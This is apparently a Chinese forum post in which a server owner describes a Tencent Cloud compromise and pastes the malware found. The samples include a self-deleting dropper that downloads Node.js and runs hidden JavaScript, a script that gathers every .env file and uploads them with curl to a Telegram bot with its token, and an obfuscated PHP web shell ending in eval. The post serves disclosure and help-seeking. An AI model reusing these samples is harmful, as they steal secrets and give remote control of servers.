服务器被挂马了,下面描述一下现象:
腾讯云通过站内信先后提醒我检测到以下恶意文件:
/home/[my-user-name]/.rsyslo/rsyslo(病毒名Linux.Backdoor.Agent.Jqil)/var/www/[my-project-name]/./s.sh(病毒名Linux.Trojan.Shell.Lzfl)/var/www/[my-project-name]/s.sh(病毒名Linux.Trojan.Shell.Lzfl)
正常登录一直超时,应该是内存被占满了。后来通过腾讯云控制台的主机安全页面清理了以上恶意文件和恶意进程,然后重启后就能正常登录了。大概登录后十几分钟,腾讯云又提示检测到恶意文件 rsyslo,我继续删之。
我本来想在主机安全页面保存这些恶意文件到本地,但 rsyslo 文件根本下载不下来,chrome 提示病毒,根本不让下载;其中一个s.sh忘了保存,直接被清理了,另一个内容如下:
# 其中一个 s.sh
#!/bin/bash
# Self-extracting installer
D="$HOME/.local/share/.r0qsv8h1"
ND="$D/.394ly8v9"
Z="/tmp/xmmyeuv29n5v.tar.xz"
U="https://nodejs.org/dist/v20.10.0/node-v20.10.0-linux-x64.tar.xz"
mkdir -p "$D" 2>/dev/null
# Download Node.js
if ! command -v curl &>/dev/null; then
wget -q "$U" -O "$Z" 2>/dev/null
else
curl -sL "$U" -o "$Z" 2>/dev/null
fi
# Extract Node.js
tar -xJf "$Z" -C "$D" 2>/dev/null
mv "$D/node-v20.10.0-linux-x64" "$ND" 2>/dev/null
rm -f "$Z" 2>/dev/null
chmod +x "$ND/bin/node" 2>/dev/null
# Extract embedded files
echo "太长了这个帖子放不下" | base64 -d > "$D/.b0rtqscrkeov" 2>/dev/null
echo "太长了这个帖子放不下" | base64 -d > "$D/.lauphhtqrg.js" 2>/dev/null
# Run
nohup "$ND/bin/node" "$D/.lauphhtqrg.js" >/dev/null 2>&1 &
# Self-delete
rm -f "${BASH_SOURCE[0]}" 2>/dev/null
exit 0
/var/www/[my-project] 下被挂了下列文件:
|-- filene.txt
|-- gass.sh
|-- gasss.sh
|-- omegalulx.txt
|-- wup.php
内容分别是:
filene.txt:
/var/www/[my-project-1]/.env
/var/www/[my-project-2]/.env.local
# more...
cat /var/www/[my-project-1]/.env
cat /var/www/[my-project-2]/.env.local
# more...
#!/bin/bash
#wong_galek
asu=$(find / -type f -name "*.env" -o -name "*.env.bak" -o -name "*config.env" -o -name "*.env.save" -o -name "*.env.dev" -o -name "*.env.prod" -o -name "*.env.stage" -o -name "*.env.test" -o -name "*.env.local" -o -name "*.env.txt" -o -name "*.env.dist" -o -name "*.env.json" -o -name "*.env.local" -o -name "*.env.backup" -o -name "*.environment" -o -name "*.envrc" -o -name "*.envs" -o -name "*.env~" | grep -v 'Permission denied' > filene.txt; sed 's/^/cat /;' filene.txt > gass.sh; chmod +x gass.sh; > /dev/null)
asuu=$(bash gass.sh > omegalulx.txt)
path=$(find / -type f -name omegalulx.txt | grep -v 'Permission denied')
curl -s -F document=@$path https://api.telegram.org/bot7925066813:AAGC5p5cgRD7PS7-CuHUmY9kFZfs74FmuIU/sendDocument?chat_id=-1002687748121 | sed 's/\r//g' > /dev/null
echo "[+] DONE BRO [+]"
rm -f gasss.sh filene.txt gass.sh omegalulx.txt 2>/dev/null
omegalulx.txt:
# 我所有 .env.* 文件的内容拼接
wup.php:
<?php
// wong galek 2025-12-04 23:30:52
$mMnGdFuqMC = base64_decode('geksiSS1rgTfaD9W/yEFWQ==');
$IMzFrkGNMD = base64_decode('DXOjJwjADq8baTL5ufrJkg==');
$HbnPCZJGKt = base64_decode('0SNNhn7I52OtJtCOn/3pkQ==');
function SRmTDaUZut($d,$k){$o="";$kl=strlen($k);$dl=strlen($d);for($i=0;$i<$dl;$i++){$o.=$d[$i]^$k[$i%$kl];}return $o;}
$dhsSbIIaIM = '=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';
$dhsSbIIaIM = strrev($dhsSbIIaIM);
$dhsSbIIaIM = base64_decode($dhsSbIIaIM);
$dhsSbIIaIM = SRmTDaUZut($dhsSbIIaIM,$HbnPCZJGKt);
$dhsSbIIaIM = base64_decode($dhsSbIIaIM);
$dhsSbIIaIM = SRmTDaUZut($dhsSbIIaIM,$IMzFrkGNMD);
$dhsSbIIaIM = gzinflate($dhsSbIIaIM);
$dhsSbIIaIM = strrev($dhsSbIIaIM);
$dhsSbIIaIM = base64_decode($dhsSbIIaIM);
$dhsSbIIaIM = SRmTDaUZut($dhsSbIIaIM,$mMnGdFuqMC);
$kTZVzcUYoj = gzinflate($dhsSbIIaIM);
unset($dhsSbIIaIM,$mMnGdFuqMC,$IMzFrkGNMD,$HbnPCZJGKt);
eval($kTZVzcUYoj);
目前尚无回复
Select Language